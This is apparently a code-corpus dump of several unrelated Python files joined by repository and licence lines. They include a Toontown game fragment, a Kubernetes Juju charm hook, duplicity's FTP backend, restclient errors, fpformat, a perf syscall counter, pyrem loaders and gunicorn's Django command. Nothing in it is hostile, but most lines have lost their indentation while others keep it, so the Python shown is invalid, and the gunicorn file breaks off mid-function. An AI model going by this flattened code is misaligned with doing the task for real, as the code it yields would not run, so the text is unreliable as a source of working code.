base.localAvatar.setPos(self.elevOut, 0, -22, 0)
base.localAvatar.setHpr(self.elevOut, 0, 0, 0)
base.cr.playGame.getPlace().fsm.request('walk')
def exitResting(self):
self._setAvPosFDC.destroy()
self.waitMusic.stop()
def enterReward(self, ts = 0):
if self.isBossFloor(self.currentFloor):
self.penthouseOutroTrack = self.__outroPenthouse()
self.penthouseOutroTrack.start(ts)
else:
self.exitCogdoBuilding()
def exitReward(self):
self.notify.debug('exitReward')
if self.penthouseOutroTrack:
self.penthouseOutroTrack.finish()
DelayDelete.cleanupDelayDeletes(self.penthouseOutroTrack)
self.penthouseOutroTrack = None
if not self.penthouseOutroChatDoneTrack:
            self.notify.debug('exitReward: instantiating outroPenthouseChatDone track')
self.__outroPenthouseChatDone()
self.penthouseOutroChatDoneTrack.finish()
self.penthouseOutroChatDoneTrack = None
return
def enterFailed(self, ts = 0):
self.exitCogdoBuilding()
def exitFailed(self):
self.notify.debug('exitFailed()')
self.exitCogdoBuilding()
def exitCogdoBuilding(self):
if base.localAvatar.hp < 0:
return
else:
base.localAvatar.b_setParent(ToontownGlobals.SPHidden)
request = {'loader': ZoneUtil.getBranchLoaderName(self.extZoneId),
'where': ZoneUtil.getToonWhereName(self.extZoneId),
'how': 'elevatorIn',
'hoodId': ZoneUtil.getHoodId(self.extZoneId),
'zoneId': self.extZoneId,
'shardId': None,
'avId': -1,
'bldgDoId': self.distBldgDoId}
messenger.send('DSIDoneEvent', [request])
return
def displayBadges(self):
numFloors = self.layout.getNumGameFloors()
        if numFloors > 5 or numFloors < 3:
            self.notify.warning('Invalid floor number for display badges.')
            return
for player in xrange(len(self.toons)):
goldBadge = loader.loadModel('phase_5/models/cogdominium/tt_m_ara_crg_goldTrophy')
goldBadge.setScale(1.2)
goldNode = render.find('**/gold_0' + str(player + 1))
goldBadge.reparentTo(goldNode)
for floor in xrange(numFloors):
silverBadge = loader.loadModel('phase_5/models/cogdominium/tt_m_ara_crg_silverTrophy')
silverBadge.setScale(1.2)
silverNode = render.find('**/silver_0' + str(floor * 4 + (player + 1)))
silverBadge.reparentTo(silverNode)
def __outroPenthouse(self):
avatar = base.localAvatar
trackName = '__outroPenthouse-%d' % avatar.doId
track = Parallel(name=trackName)
base.cr.playGame.getPlace().fsm.request('stopped')
if self.FOType == 'l':
speech = TTLocalizer.CogdoExecutiveSuiteToonThankYouLawbot
else:
speech = TTLocalizer.CogdoExecutiveSuiteToonThankYou % self.SOSToonName
track.append(Sequence(Func(camera.wrtReparentTo, localAvatar), Func(camera.setPos, 0, -9, 9), Func(camera.lookAt, Point3(5, 15, 0)), Parallel(self.cage.posInterval(0.75, self.cagePos[1], blendType='easeOut'), SoundInterval(self.cageLowerSfx, duration=0.5)), Parallel(self.cageDoor.hprInterval(0.5, VBase3(0, 90, 0), blendType='easeOut'), Sequence(SoundInterval(self.cageDoorSfx), duration=0)), Wait(0.25), Func(self.shopOwnerNpc.wrtReparentTo, render), Func(self.shopOwnerNpc.setScale, 1), Func(self.shopOwnerNpc.loop, 'walk'), Func(self.shopOwnerNpc.headsUp, Point3(0, 10, 0)), ParallelEndTogether(self.shopOwnerNpc.posInterval(1.5, Point3(0, 10, 0)), self.shopOwnerNpc.hprInterval(0.5, VBase3(180, 0, 0), blendType='easeInOut')), Func(self.shopOwnerNpc.setChatAbsolute, TTLocalizer.CagedToonYippee, CFSpeech), ActorInterval(self.shopOwnerNpc, 'jump'), Func(self.shopOwnerNpc.loop, 'neutral'), Func(self.shopOwnerNpc.headsUp, localAvatar), Func(self.shopOwnerNpc.setLocalPageChat, speech, 0), Func(camera.lookAt, self.shopOwnerNpc, Point3(0, 0, 2))))
self.activeIntervals[trackName] = track
self.acceptOnce(self.shopOwnerNpc.uniqueName('doneChatPage'), self.__outroPenthouseChatDone)
return track
def __outroPenthouseChatDone(self, elapsed = None):
self.shopOwnerNpc.setChatAbsolute(TTLocalizer.CogdoExecutiveSuiteToonBye, CFSpeech)
track = Parallel(Sequence(ActorInterval(self.shopOwnerNpc, 'wave'), Func(self.shopOwnerNpc.loop, 'neutral')), Sequence(Wait(2.0), Func(self.exitCogdoBuilding), Func(base.camLens.setFov, settings['fov'])))
track.start()
self.penthouseOutroChatDoneTrack = track | apache-2.0 |
thucatebay/kubernetes | cluster/juju/charms/trusty/kubernetes-master/hooks/hooks.py | 52 | 11792 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The main hook file is called by Juju.
"""
import contextlib
import os
import socket
import subprocess
import sys
from charmhelpers.core import hookenv, host
from charmhelpers.contrib import ssl
from kubernetes_installer import KubernetesInstaller
from path import Path
hooks = hookenv.Hooks()
@contextlib.contextmanager
def check_sentinel(filepath):
"""
    A context manager that yields whether the sentinel file already exists,
    creates the file if the wrapped block raises, and removes it once the
    block completes without error.
"""
fail = False
try:
yield filepath.exists()
except:
fail = True
filepath.touch()
raise
finally:
if fail is False and filepath.exists():
filepath.remove()
@hooks.hook('config-changed')
def config_changed():
"""
On the execution of the juju event 'config-changed' this function
determines the appropriate architecture and the configured version to
create kubernetes binary files.
"""
hookenv.log('Starting config-changed')
charm_dir = Path(hookenv.charm_dir())
config = hookenv.config()
# Get the version of kubernetes to install.
version = config['version']
username = config['username']
password = config['password']
certificate = config['apiserver-cert']
key = config['apiserver-key']
if version == 'master':
        # The 'master' branch of kubernetes is used when master is configured.
branch = 'master'
elif version == 'local':
# Check for kubernetes binaries in the local files/output directory.
branch = None
else:
# Create a branch to a tag to get the release version.
branch = 'tags/{0}'.format(version)
cert_file = '/srv/kubernetes/apiserver.crt'
key_file = '/srv/kubernetes/apiserver.key'
# When the cert or key changes we need to restart the apiserver.
if config.changed('apiserver-cert') or config.changed('apiserver-key'):
hookenv.log('Certificate or key has changed.')
if not certificate or not key:
generate_cert(key=key_file, cert=cert_file)
else:
hookenv.log('Writing new certificate and key to server.')
with open(key_file, 'w') as file:
file.write(key)
with open(cert_file, 'w') as file:
file.write(certificate)
# Restart apiserver as the certificate or key has changed.
if host.service_running('apiserver'):
host.service_restart('apiserver')
# Reload nginx because it proxies https to apiserver.
if host.service_running('nginx'):
host.service_reload('nginx')
if config.changed('username') or config.changed('password'):
hookenv.log('Username or password changed, creating authentication.')
basic_auth(config['username'], config['username'], config['password'])
if host.service_running('apiserver'):
host.service_restart('apiserver')
# Get package architecture, rather than arch from the kernel (uname -m).
arch = subprocess.check_output(['dpkg', '--print-architecture']).strip()
if not branch:
output_path = charm_dir / 'files/output'
kube_installer = KubernetesInstaller(arch, version, output_path)
else:
        # Build the kubernetes binaries from source on the units.
kubernetes_dir = Path('/opt/kubernetes')
# Construct the path to the binaries using the arch.
output_path = kubernetes_dir / '_output/local/bin/linux' / arch
kube_installer = KubernetesInstaller(arch, version, output_path)
if not kubernetes_dir.exists():
message = 'The kubernetes source directory {0} does not exist. ' \
'Was the kubernetes repository cloned during the install?'
print(message.format(kubernetes_dir))
exit(1)
# Change to the kubernetes directory (git repository).
with kubernetes_dir:
# Create a command to get the current branch.
git_branch = 'git branch | grep "\*" | cut -d" " -f2'
current_branch = subprocess.check_output(git_branch, shell=True)
current_branch = current_branch.strip()
print('Current branch: ', current_branch)
# Create the path to a file to indicate if the build was broken.
broken_build = charm_dir / '.broken_build'
            # Leave a .broken_build sentinel behind if this block raises.
with check_sentinel(broken_build) as last_build_failed:
print('Last build failed: ', last_build_failed)
# Rebuild if current version is different or last build failed.
if current_branch != version or last_build_failed:
kube_installer.build(branch)
if not output_path.isdir():
broken_build.touch()
        # Create the symbolic links to the right directories.
kube_installer.install()
relation_changed()
hookenv.log('The config-changed hook completed successfully.')
@hooks.hook('etcd-relation-changed', 'minions-api-relation-changed')
def relation_changed():
template_data = get_template_data()
# Check required keys
for k in ('etcd_servers',):
if not template_data.get(k):
print 'Missing data for', k, template_data
return
print 'Running with\n', template_data
# Render and restart as needed
for n in ('apiserver', 'controller-manager', 'scheduler'):
if render_file(n, template_data) or not host.service_running(n):
host.service_restart(n)
# Render the file that makes the kubernetes binaries available to minions.
if render_file(
'distribution', template_data,
'conf.tmpl', '/etc/nginx/sites-enabled/distribution') or \
not host.service_running('nginx'):
host.service_reload('nginx')
# Render the default nginx template.
if render_file(
'nginx', template_data,
'conf.tmpl', '/etc/nginx/sites-enabled/default') or \
not host.service_running('nginx'):
host.service_reload('nginx')
# Send api endpoint to minions
notify_minions()
@hooks.hook('network-relation-changed')
def network_relation_changed():
relation_id = hookenv.relation_id()
hookenv.relation_set(relation_id, ignore_errors=True)
def notify_minions():
print('Notify minions.')
config = hookenv.config()
for r in hookenv.relation_ids('minions-api'):
hookenv.relation_set(
r,
hostname=hookenv.unit_private_ip(),
port=8080,
version=config['version'])
print('Notified minions of version ' + config['version'])
def basic_auth(name, id, pwd=None, file='/srv/kubernetes/basic-auth.csv'):
"""
Create a basic authentication file for kubernetes. The file is a csv file
with 3 columns: password, user name, user id. From the Kubernetes docs:
The basic auth credentials last indefinitely, and the password cannot be
changed without restarting apiserver.
"""
if not pwd:
import random
import string
alphanumeric = string.ascii_letters + string.digits
pwd = ''.join(random.choice(alphanumeric) for _ in range(16))
lines = []
auth_file = Path(file)
if auth_file.isfile():
lines = auth_file.lines()
for line in lines:
target = ',{0},{1}'.format(name, id)
if target in line:
lines.remove(line)
auth_line = '{0},{1},{2}'.format(pwd, name, id)
lines.append(auth_line)
auth_file.write_lines(lines)
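# --- Illustrative example (editor addition, not part of the charm) ---
# What basic_auth() writes: one CSV row per user, password first. All values
# and the path below are hypothetical.
def _basic_auth_example():
    basic_auth('admin', 'admin', 'sekrit', file='/tmp/basic-auth.csv')
    # /tmp/basic-auth.csv now contains the row: sekrit,admin,admin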
def generate_cert(common_name=None,
key='/srv/kubernetes/apiserver.key',
cert='/srv/kubernetes/apiserver.crt'):
"""
Create the certificate and key for the Kubernetes tls enablement.
"""
hookenv.log('Generating new self signed certificate and key', 'INFO')
if not common_name:
common_name = hookenv.unit_get('public-address')
if os.path.isfile(key) or os.path.isfile(cert):
hookenv.log('Overwriting the existing certificate or key', 'WARNING')
hookenv.log('Generating certificate for {0}'.format(common_name), 'INFO')
# Generate the self signed certificate with the public address as CN.
# https://pythonhosted.org/charmhelpers/api/charmhelpers.contrib.ssl.html
ssl.generate_selfsigned(key, cert, cn=common_name)
def get_template_data():
rels = hookenv.relations()
config = hookenv.config()
version = config['version']
template_data = {}
template_data['etcd_servers'] = ','.join([
'http://%s:%s' % (s[0], s[1]) for s in sorted(
get_rel_hosts('etcd', rels, ('hostname', 'port')))])
template_data['minions'] = ','.join(get_rel_hosts('minions-api', rels))
private_ip = hookenv.unit_private_ip()
public_ip = hookenv.unit_public_ip()
template_data['api_public_address'] = _bind_addr(public_ip)
template_data['api_private_address'] = _bind_addr(private_ip)
template_data['bind_address'] = '127.0.0.1'
template_data['api_http_uri'] = 'http://%s:%s' % (private_ip, 8080)
template_data['api_https_uri'] = 'https://%s:%s' % (private_ip, 6443)
arch = subprocess.check_output(['dpkg', '--print-architecture']).strip()
template_data['web_uri'] = '/kubernetes/%s/local/bin/linux/%s/' % (version,
arch)
if version == 'local':
template_data['alias'] = hookenv.charm_dir() + '/files/output/'
else:
directory = '/opt/kubernetes/_output/local/bin/linux/%s/' % arch
template_data['alias'] = directory
_encode(template_data)
return template_data
def _bind_addr(addr):
if addr.replace('.', '').isdigit():
return addr
try:
return socket.gethostbyname(addr)
except socket.error:
raise ValueError('Could not resolve address %s' % addr)
def _encode(d):
for k, v in d.items():
if isinstance(v, unicode):
d[k] = v.encode('utf8')
def get_rel_hosts(rel_name, rels, keys=('private-address',)):
hosts = []
for r, data in rels.get(rel_name, {}).items():
for unit_id, unit_data in data.items():
if unit_id == hookenv.local_unit():
continue
values = [unit_data.get(k) for k in keys]
if not all(values):
continue
hosts.append(len(values) == 1 and values[0] or values)
return hosts
def render_file(name, data, src_suffix='upstart.tmpl', tgt_path=None):
tmpl_path = os.path.join(
os.environ.get('CHARM_DIR'), 'files', '%s.%s' % (name, src_suffix))
with open(tmpl_path) as fh:
tmpl = fh.read()
rendered = tmpl % data
if tgt_path is None:
tgt_path = '/etc/init/%s.conf' % name
if os.path.exists(tgt_path):
with open(tgt_path) as fh:
contents = fh.read()
if contents == rendered:
return False
with open(tgt_path, 'w') as fh:
fh.write(rendered)
return True
if __name__ == '__main__':
hooks.execute(sys.argv)
| apache-2.0 |
andreagrandi/duplicity-sx | duplicity/backends/ftpbackend.py | 2 | 4952 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright 2002 Ben Escoto <ben@emerose.org>
# Copyright 2007 Kenneth Loafman <kenneth@loafman.com>
#
# This file is part of duplicity.
#
# Duplicity is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# Duplicity is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with duplicity; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import os.path
import urllib
import duplicity.backend
from duplicity import globals
from duplicity import log
from duplicity import tempdir
class FTPBackend(duplicity.backend.Backend):
"""Connect to remote store using File Transfer Protocol"""
def __init__(self, parsed_url):
duplicity.backend.Backend.__init__(self, parsed_url)
# we expect an error return, so go low-level and ignore it
try:
p = os.popen("ncftpls -v")
fout = p.read()
ret = p.close()
except Exception:
pass
# the expected error is 8 in the high-byte and some output
if ret != 0x0800 or not fout:
log.FatalError("NcFTP not found: Please install NcFTP version 3.1.9 or later",
log.ErrorCode.ftp_ncftp_missing)
# version is the second word of the first line
version = fout.split('\n')[0].split()[1]
if version < "3.1.9":
log.FatalError("NcFTP too old: Duplicity requires NcFTP version 3.1.9,"
"3.2.1 or later. Version 3.2.0 will not work properly.",
log.ErrorCode.ftp_ncftp_too_old)
elif version == "3.2.0":
log.Warn("NcFTP (ncftpput) version 3.2.0 may fail with duplicity.\n"
"see: http://www.ncftpd.com/ncftp/doc/changelog.html\n"
"If you have trouble, please upgrade to 3.2.1 or later",
log.WarningCode.ftp_ncftp_v320)
log.Notice("NcFTP version is %s" % version)
self.parsed_url = parsed_url
self.url_string = duplicity.backend.strip_auth_from_url(self.parsed_url)
# This squelches the "file not found" result from ncftpls when
# the ftp backend looks for a collection that does not exist.
# version 3.2.2 has error code 5, 1280 is some legacy value
self.popen_breaks[ 'ncftpls' ] = [ 5, 1280 ]
# Use an explicit directory name.
if self.url_string[-1] != '/':
self.url_string += '/'
self.password = self.get_password()
if globals.ftp_connection == 'regular':
self.conn_opt = '-E'
else:
self.conn_opt = '-F'
self.tempfile, self.tempname = tempdir.default().mkstemp()
os.write(self.tempfile, "host %s\n" % self.parsed_url.hostname)
os.write(self.tempfile, "user %s\n" % self.parsed_url.username)
os.write(self.tempfile, "pass %s\n" % self.password)
os.close(self.tempfile)
self.flags = "-f %s %s -t %s -o useCLNT=0,useHELP_SITE=0 " % \
(self.tempname, self.conn_opt, globals.timeout)
        if parsed_url.port is not None and parsed_url.port != 21:
            self.flags += " -P '%s'" % (parsed_url.port)
def _put(self, source_path, remote_filename):
remote_path = os.path.join(urllib.unquote(self.parsed_url.path.lstrip('/')), remote_filename).rstrip()
commandline = "ncftpput %s -m -V -C '%s' '%s'" % \
(self.flags, source_path.name, remote_path)
self.subprocess_popen(commandline)
def _get(self, remote_filename, local_path):
remote_path = os.path.join(urllib.unquote(self.parsed_url.path), remote_filename).rstrip()
commandline = "ncftpget %s -V -C '%s' '%s' '%s'" % \
(self.flags, self.parsed_url.hostname, remote_path.lstrip('/'), local_path.name)
self.subprocess_popen(commandline)
def _list(self):
# Do a long listing to avoid connection reset
commandline = "ncftpls %s -l '%s'" % (self.flags, self.url_string)
_, l, _ = self.subprocess_popen(commandline)
# Look for our files as the last element of a long list line
return [x.split()[-1] for x in l.split('\n') if x and not x.startswith("total ")]
def _delete(self, filename):
commandline = "ncftpls %s -l -X 'DELE %s' '%s'" % \
(self.flags, filename, self.url_string)
self.subprocess_popen(commandline)
duplicity.backend.register_backend("ftp", FTPBackend)
| gpl-2.0 |
wishtack/py-restclient | restclient/errors.py | 1 | 2603 | # -*- coding: utf-8 -
#
# Copyright (c) 2008, 2009 Benoit Chesneau <benoitc@e-engura.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
"""
exception classes.
"""
class ResourceError(Exception):
def __init__(self, msg=None, http_code=None, response=None):
self.msg = msg or ''
self.status_code = http_code
self.response = response
Exception.__init__(self)
def _get_message(self):
return self.msg
def _set_message(self, msg):
self.msg = msg or ''
message = property(_get_message, _set_message)
def __str__(self):
if self.msg:
return self.msg
try:
return self._fmt % self.__dict__
except (NameError, ValueError, KeyError) as e:
return 'Unprintable exception %s: %s' \
% (self.__class__.__name__, str(e))
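# Subclasses may provide a ``_fmt`` template used by __str__ when no
# message is set; a minimal sketch (class name and template are
# assumptions, not part of this library):
#   class Timeout(ResourceError):
#       _fmt = 'request timed out: %(msg)s'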
class ResourceNotFound(ResourceError):
"""Exception raised when no resource was found at the given url.
"""
class Unauthorized(ResourceError):
"""Exception raised when an authorization is required to access to
the resource specified.
"""
class RequestFailed(ResourceError):
"""Exception raised when an unexpected HTTP error is received in response
to a request.
The request failed, meaning the remote HTTP server returned a code
other than success, unauthorized, or NotFound.
The exception message attempts to extract the error
You can get the status code by e.http_code, or see anything about the
response via e.response. For example, the entire result body (which is
probably an HTML error page) is e.response.body.
"""
class RequestError(Exception):
"""Exception raised when a request is malformed"""
class InvalidUrl(Exception):
"""
Not a valid url for use with this software.
"""
class TransportError(Exception):
"""Error raised by a transport """ | isc |
WhireCrow/openwrt-mt7620 | staging_dir/target-mipsel_r2_uClibc-0.9.33.2/usr/lib/python2.7/fpformat.py | 322 | 4699 | """General floating point formatting functions.
Functions:
fix(x, digits_behind)
sci(x, digits_behind)
Each takes a number or a string and a number of digits as arguments.
Parameters:
x: number to be formatted; or a string resembling a number
digits_behind: number of digits behind the decimal point
"""
from warnings import warnpy3k
warnpy3k("the fpformat module has been removed in Python 3.0", stacklevel=2)
del warnpy3k
import re
__all__ = ["fix","sci","NotANumber"]
# Compiled regular expression to "decode" a number
decoder = re.compile(r'^([-+]?)0*(\d*)((?:\.\d*)?)(([eE][-+]?\d+)?)$')
# \0 the whole thing
# \1 leading sign or empty
# \2 digits left of decimal point
# \3 fraction (empty or begins with point)
# \4 exponent part (empty or begins with 'e' or 'E')
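# For example (illustrative): decoder.match('-003.14e+2').group(1, 2, 3, 4)
# returns ('-', '3', '.14', 'e+2').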
try:
class NotANumber(ValueError):
pass
except TypeError:
NotANumber = 'fpformat.NotANumber'
def extract(s):
"""Return (sign, intpart, fraction, expo) or raise an exception:
sign is '+' or '-'
intpart is 0 or more digits beginning with a nonzero
fraction is 0 or more digits
expo is an integer"""
res = decoder.match(s)
if res is None: raise NotANumber, s
sign, intpart, fraction, exppart = res.group(1,2,3,4)
if sign == '+': sign = ''
if fraction: fraction = fraction[1:]
if exppart: expo = int(exppart[1:])
else: expo = 0
return sign, intpart, fraction, expo
def unexpo(intpart, fraction, expo):
"""Remove the exponent by changing intpart and fraction."""
if expo > 0: # Move the point left
f = len(fraction)
intpart, fraction = intpart + fraction[:expo], fraction[expo:]
if expo > f:
intpart = intpart + '0'*(expo-f)
elif expo < 0: # Move the point right
i = len(intpart)
intpart, fraction = intpart[:expo], intpart[expo:] + fraction
if expo < -i:
fraction = '0'*(-expo-i) + fraction
return intpart, fraction
def roundfrac(intpart, fraction, digs):
"""Round or extend the fraction to size digs."""
f = len(fraction)
if f <= digs:
return intpart, fraction + '0'*(digs-f)
i = len(intpart)
if i+digs < 0:
return '0'*-digs, ''
total = intpart + fraction
nextdigit = total[i+digs]
if nextdigit >= '5': # Hard case: increment last digit, may have carry!
n = i + digs - 1
while n >= 0:
if total[n] != '9': break
n = n-1
else:
total = '0' + total
i = i+1
n = 0
total = total[:n] + chr(ord(total[n]) + 1) + '0'*(len(total)-n-1)
intpart, fraction = total[:i], total[i:]
if digs >= 0:
return intpart, fraction[:digs]
else:
return intpart[:digs] + '0'*-digs, ''
def fix(x, digs):
"""Format x as [-]ddd.ddd with 'digs' digits after the point
and at least one digit before.
If digs <= 0, the point is suppressed."""
if type(x) != type(''): x = repr(x)
try:
sign, intpart, fraction, expo = extract(x)
except NotANumber:
return x
intpart, fraction = unexpo(intpart, fraction, expo)
intpart, fraction = roundfrac(intpart, fraction, digs)
while intpart and intpart[0] == '0': intpart = intpart[1:]
if intpart == '': intpart = '0'
if digs > 0: return sign + intpart + '.' + fraction
else: return sign + intpart
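# Worked example (illustrative): fix('123.456', 2) extracts
# ('', '123', '456', 0), rounds the fraction to two digits and
# returns '123.46'.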
def sci(x, digs):
"""Format x as [-]d.dddE[+-]ddd with 'digs' digits after the point
and exactly one digit before.
If digs is <= 0, one digit is kept and the point is suppressed."""
if type(x) != type(''): x = repr(x)
sign, intpart, fraction, expo = extract(x)
if not intpart:
while fraction and fraction[0] == '0':
fraction = fraction[1:]
expo = expo - 1
if fraction:
intpart, fraction = fraction[0], fraction[1:]
expo = expo - 1
else:
intpart = '0'
else:
expo = expo + len(intpart) - 1
intpart, fraction = intpart[0], intpart[1:] + fraction
digs = max(0, digs)
intpart, fraction = roundfrac(intpart, fraction, digs)
if len(intpart) > 1:
intpart, fraction, expo = \
intpart[0], intpart[1:] + fraction[:-1], \
expo + len(intpart) - 1
s = sign + intpart
if digs > 0: s = s + '.' + fraction
e = repr(abs(expo))
e = '0'*(3-len(e)) + e
if expo < 0: e = '-' + e
else: e = '+' + e
return s + 'e' + e
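# Worked example (illustrative): sci(123.456, 2) normalizes to a single
# leading digit (exponent 2) and returns '1.23e+002'.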
def test():
"""Interactive test run."""
try:
while 1:
x, digs = input('Enter (x, digs): ')
print x, fix(x, digs), sci(x, digs)
except (EOFError, KeyboardInterrupt):
pass
| gpl-2.0 |
tekkamanninja/linux-beagleboard | tools/perf/scripts/python/syscall-counts.py | 11181 | 1522 | # system call counts
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts.py [comm]\n"
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40s %10d\n" % (syscall_name(id), val),
| gpl-2.0 |
gilestrolab/pyrem | src/pyrem/io.py | 1 | 3060 | from pyrem.polygram import Polygram
__author__ = 'quentin'
# TODO: edf, csv
import scipy.io as scio
import pandas as pd
import numpy as np
from pyrem.time_series import Signal, Annotation
import joblib
from pyrem.time_series import BiologicalTimeSeries, Annotation, Signal
def polygram_from_pkl(filename):
return joblib.load(filename)
def signal_from_pkl(filename):
return joblib.load(filename)
#
# def signal_from_csv(file_name, sampling_freq):
# data = pd.read_csv(file_name, engine="c", header=None, dtype=np.float32)
# return Signal(data, sampling_freq)
def _annotation_from_spike_txt(filename, doubt_chars):
"""
    Hacky parser, needed because Spike does not export epochs of exactly 5.000 s.
:param filename:
:return:
"""
df = pd.read_csv(filename, skiprows=16, sep="\t", names=["t", "x1", "x2", "x3","x4", "x5","y"], header=None, na_values="nan")
ts = df["y"]
ts.index = pd.to_datetime(df["t"] * 1e9)
annotations = ts.dropna()
annotations = annotations.resample("5s", how="first")
annotations = annotations.fillna(method="ffill")
np_ord = np.vectorize(lambda x : ord(x.upper()))
annot_values = np_ord(np.array(annotations)).flatten()
annot_values = annot_values.astype(np.uint8)
annot_probas = [0 if a in doubt_chars else 1 for a in annot_values]
return Annotation(annot_values, 1/5.0, annot_probas, name="vigilance_state", type="vigilance_state")
def polygram_from_spike_matlab_file(signal_filename, annotation_filename, fs, annotation_fs, channel_names, channel_types, doubt_chars,resample_signals, metadata={}):
"""
    This function loads a matlab file exported by Spike as a polygram.
:param signal_filename: the matlab file name
:return: a polygram
"""
an = _annotation_from_spike_txt(annotation_filename, doubt_chars)
type_for_name = dict(zip(channel_names, channel_types))
matl = scio.loadmat(signal_filename, squeeze_me=True, struct_as_record=False)
data_channels = {}
# annotation_channels = {}
for k in matl.keys():
# exclude metadata such as "__global__", "__version__" ...
if not k.startswith("__"):
obj = matl[k]
channel_number = int(k.split("_")[-1][2:])
if "values" in dir(obj):
channel_id = channel_names[channel_number-1]
data_channels[channel_id] = obj.values
elif "text" in dir(obj):
pass
# annotation_channels["Stage_%i" % (channel_number-1)] = obj.text
del matl
crop_at = np.min([i.size for _,i in data_channels.items()])
for k,a in data_channels.items():
data_channels[k] = a[:crop_at]
signals = [Signal(data,fs, name=name, type=type_for_name[name] ) for name,data in data_channels.items()]
del data_channels
if resample_signals:
signals = [ s.resample(resample_signals) for s in signals]
#signals = [s[:an.duration]for s in signals]
signals.append(an)
return Polygram(signals)
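# Illustrative call (file names, rates and channel layout are assumptions):
#   pol = polygram_from_spike_matlab_file(
#       'rec.mat', 'rec.txt', fs=256.0, annotation_fs=1/5.0,
#       channel_names=['EEG', 'EMG'], channel_types=['eeg', 'emg'],
#       doubt_chars=[ord('?')], resample_signals=200.0)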
| gpl-3.0 |
Hoekz/hackness-monster | venv/lib/python2.7/site-packages/gunicorn/management/commands/run_gunicorn.py | 23 | 3638 | # -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
from optparse import make_option
import sys
from django.core.management.base import BaseCommand, CommandError
from gunicorn.app.djangoapp import DjangoApplicationCommand
from gunicorn.config import make_settings
from gunicorn import util
# monkey patch django.
# This patch makes sure that we use real threads to get the ident, which
# is needed if we are using gevent or eventlet.
try:
from django.db.backends import BaseDatabaseWrapper, DatabaseError
if "validate_thread_sharing" in BaseDatabaseWrapper.__dict__:
import thread
_get_ident = thread.get_ident
__old__init__ = BaseDatabaseWrapper.__init__
def _init(self, *args, **kwargs):
__old__init__(self, *args, **kwargs)
self._thread_ident = _get_ident()
def _validate_thread_sharing(self):
if (not self.allow_thread_sharing
and self._thread_ident != _get_ident()):
raise DatabaseError("DatabaseWrapper objects created in a "
"thread can only be used in that same thread. The object "
"with alias '%s' was created in thread id %s and this is "
"thread id %s."
% (self.alias, self._thread_ident, _get_ident()))
BaseDatabaseWrapper.__init__ = _init
BaseDatabaseWrapper.validate_thread_sharing = _validate_thread_sharing
except ImportError:
pass
def make_options():
opts = [
make_option('--adminmedia', dest='admin_media_path', default='',
help='Specifies the directory from which to serve admin media.')
]
g_settings = make_settings(ignore=("version"))
keys = g_settings.keys()
for k in keys:
if k in ('pythonpath', 'django_settings',):
continue
setting = g_settings[k]
if not setting.cli:
continue
args = tuple(setting.cli)
kwargs = {
"dest": setting.name,
"metavar": setting.meta or None,
"action": setting.action or "store",
"type": setting.type or "string",
"default": None,
"help": "%s [%s]" % (setting.short, setting.default)
}
if kwargs["action"] != "store":
kwargs.pop("type")
opts.append(make_option(*args, **kwargs))
return tuple(opts)
GUNICORN_OPTIONS = make_options()
class Command(BaseCommand):
option_list = BaseCommand.option_list + GUNICORN_OPTIONS
help = "Starts a fully-functional Web server using gunicorn."
args = '[optional port number, or ipaddr:port or unix:/path/to/sockfile]'
# Validation is called explicitly each time the server is reloaded.
requires_model_validation = False
def handle(self, addrport=None, *args, **options):
# deprecation warning to announce future deletion in R21
util.warn("""This command is deprecated.
You should now run your application with the WSGI interface
installed with your project. Ex.:
gunicorn myproject.wsgi:application
See https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/gunicorn/
for more info.""")
if args:
raise CommandError('Usage is run_gunicorn %s' % self.args)
if addrport:
